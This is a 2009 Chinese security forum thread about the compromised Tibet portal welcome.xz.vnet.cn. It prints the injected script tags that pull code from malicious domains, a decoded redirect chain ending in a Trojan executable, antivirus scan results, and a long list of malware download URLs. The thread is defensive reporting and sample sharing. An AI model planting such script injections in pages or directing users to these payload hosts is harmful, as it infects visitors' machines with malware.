互联星空西藏 welcome.xz.vnet.cn

显示全部楼层 · 发表于 2009-4-16 21:30:00

挂上：
<script src=http://bbg8.cn></script><script src=http://bbg8.cn></script><script src=http://bbg9.cn></script><script src=http://ccj3.cn></script><script src=http://ccj3.cn></script><script src=http://ccj5.cn></script>

其中一个的解密信息为：

关于:hxxp://welcome.xz.vnet.cn/解密的日志(部分输出 -  17):
Level  1>http://ccj5.cn
Level  2>http://u.yrd9.cn/d1/16/index.htm
Level  3>http://u.yrd9.cn/d1/16/index2.htm
Level  4>http://u.yrd9.cn/d1/16/js.js
Level  5>http://u.yrd9.cn/d1/16/yt122121.htm
Level  6>http://u.yrd9.cn/d1/16/real1.js
Level  6>http://u.yrd9.cn/d1/16/real.js
Level  6>http://u.yrd9.cn/d1/16/turl.js
Level  7>http://d1.it3s5.com/01/x.exe
Level  5>http://u.yrd9.cn/d1/16/ytbf.htm
Level  5>http://u.yrd9.cn/d1/16/ytff.htm
Level  5>http://u.yrd9.cn/d1/16/ytgg.htm
Level  5>http://u.yrd9.cn/d1/16/ytxxz.htm
Level  5>http://u.yrd9.cn/d1/16/ytvod.htm
Level  5>http://u.yrd9.cn/d1/16/ytfl.htm
Level  5>http://u.yrd9.cn/d1/16/yt14.htm
Level  4>http://u.yrd9.cn/d1/16/ytqm.htm
日志由 Redoce1.9第36次修正版于 2009-4-16 21:14:35 生成。

显示全部楼层 · 发表于 2009-4-16 21:38:13

Starting the file scan:

Begin scan in 'D:\TDDownload\x.exe'
D:\TDDownload\x.exe
[DETECTION] Is the TR/Crypt.XDR.Gen Trojan

Beginning disinfection:
D:\TDDownload\x.exe
[DETECTION] Is the TR/Crypt.XDR.Gen Trojan
[WARNING] The file was ignored!

End of the scan: 2009年4月16日  21:38
Used time: 00:00 Minute(s)

The scan has been done completely.

   0 Scanned directories
   2 Files were scanned
   1 Viruses and/or unwanted programs were found
   0 Files were classified as suspicious
   0 files were deleted
   0 Viruses and unwanted programs were repaired
   0 Files were moved to quarantine
   0 Files were renamed
   0 Files cannot be scanned
   1 Files not concerned
   0 Archives were scanned
   1 Warnings
   0 Notes

显示全部楼层 · 发表于 2009-4-16 21:38:55

A2 with ik engine kill
Gen.Trojan!IK

显示全部楼层 · 发表于 2009-4-17 06:33:58

x.exe >kaba heur ,kaba kill !

hxxp://u.yrd9.cn/d1/16/js.js >to kaba <Phishing Web Site>

显示全部楼层 · 发表于 2009-4-17 07:09:22

kaba heur 2x,to kaba kill !

http://u8.9e7fs.com/sb/ok.exe
http://u3.9e7fs.com/lm/S10.exe
http://u3.9e7fs.com/lm/S1.exe
http://u3.9e7fs.com/lm/S8.exe
http://u3.9e7fs.com/lm/S2.exe
http://u3.9e7fs.com/lm/S12.exe
http://u3.9e7fs.com/lm/S14.exe
http://u3.9e7fs.com/lm/S15.exe
http://u3.9e7fs.com/lm/S13.exe
http://u3.9e7fs.com/lm/S16.exe
http://u3.9e7fs.com/lm/S17.exe
http://u3.9e7fs.com/lm/S20.exe
http://u3.9e7fs.com/lm/S21.exe
http://u3.9e7fs.com/lm/S11.exe
http://u7.9e7fs.com/cj/1a.exe
http://u2.9e7fs.com/gz/G2.exe
http://u2.9e7fs.com/gz/G5.exe
http://u2.9e7fs.com/gz/G4.exe
http://u2.9e7fs.com/gz/Gx1.exe
http://u2.9e7fs.com/gz/G39.exe
http://u2.9e7fs.com/gz/G33.exe
http://u2.9e7fs.com/gz/G25.exe
http://u2.9e7fs.com/gz/G7.exe
http://u2.9e7fs.com/gz/G35.exe
http://u2.9e7fs.com/gz/G37.exe
http://u2.9e7fs.com/gz/Gx5.exe
http://u2.9e7fs.com/gz/G24.exe
http://u2.9e7fs.com/gz/G9.exe
http://u2.9e7fs.com/gz/G38.exe
http://u2.9e7fs.com/gz/G21.exe
http://u2.9e7fs.com/gz/G29.exe
http://u2.9e7fs.com/gz/G17.exe
http://u2.9e7fs.com/gz/G23.exe
http://u9.9e7fs.com/cj/a2.exe
http://u9.9e7fs.com/cj/a10.exe
http://u9.9e7fs.com/cj/a6.exe
http://u7.9e7fs.com/cj/a9.exe
http://u7.9e7fs.com/cj/csj.exe
http://u0.9e7fs.com/cj/a8.exe
http://u8.9e7fs.com/sb/01.exe
http://u0.9e7fs.com/cj/sb1.exe
http://u7.9e7fs.com/cj/a1.exe

[ 本帖最后由幸福的猪猪于 2009-4-17 07:17 编辑 ]

显示全部楼层 · 发表于 2009-4-17 20:53:35

微点+费尔+风云：没反应，提示网页不能正常显示，有错误。

[其它] 互联星空西藏 welcome.xz.vnet.cn

回复 1楼 qianwenxiang 的帖子